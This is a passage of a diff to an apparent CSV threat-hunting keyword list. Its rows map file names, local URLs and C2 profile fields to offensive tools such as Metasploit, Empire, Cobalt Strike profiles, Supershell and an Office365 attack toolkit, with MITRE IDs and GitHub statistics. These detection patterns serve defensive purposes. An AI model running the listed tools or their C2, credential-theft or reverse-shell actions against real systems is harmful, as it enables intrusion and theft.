tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*http://localhost:3000/ui/panel*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*http://localhost:30662*","offensive_tool_keyword","o365-attack-toolkit","A toolkit to attack Office365","T1110 - T1114 - T1119 - T1197 - T1087.002","TA0001 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/o365-attack-toolkit","1","1","N/A","10","10","954","218","2020-11-06T12:09:26Z","2019-07-22T10:39:46Z" +"*http://localhost:3000/ui/panel*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*http://localhost:30662*","offensive_tool_keyword","o365-attack-toolkit","A toolkit to attack Office365","T1110 - T1114 - T1119 - T1197 - T1087.002","TA0001 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/o365-attack-toolkit","1","1","N/A","10","10","955","218","2020-11-06T12:09:26Z","2019-07-22T10:39:46Z" "*http://localhost:58082/broadcast?id=*","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","1","N/A","10","2","152","10","2023-09-06T12:25:08Z","2023-08-02T14:30:41Z" -"*http://localhost:7474/browser/*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","neo4j default local 
url","10","10","1538","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" -"*http://localhost:8080*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*http://localhost:9090/*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*http://shell:7681/token*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. 
By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","837","111","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"*http://localhost:7474/browser/*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","neo4j default local url","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*http://localhost:8080*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*http://localhost:9090/*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*http://shell:7681/token*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" "*http://tarantula.by.ru/localroot/*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" "*http://tarantula.by.ru/localroot/2.6.x/h00lyshit*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" "*http://vpsip:28888*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - 
T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" -"*http://wfuzz.org*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*http_default_pass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*http_default_users.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*http://wfuzz.org*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*http_default_pass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*http_default_users.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*http_malleable.py*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" -"*http_ntlmrelay.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*http_owa_common.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*http_stager_client_header*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*http_stager_server_append*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - 
T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*http_stager_server_header*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - 
Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*http_stager_server_prepend*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*http_stager_uri_x64*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*http_stager_uri_x86*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*http_ntlmrelay.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*http_owa_common.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*http_stager_client_header*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*http_stager_server_append*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - 
T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*http_stager_server_header*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - 
Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*http_stager_server_prepend*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*http_stager_uri_x64*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 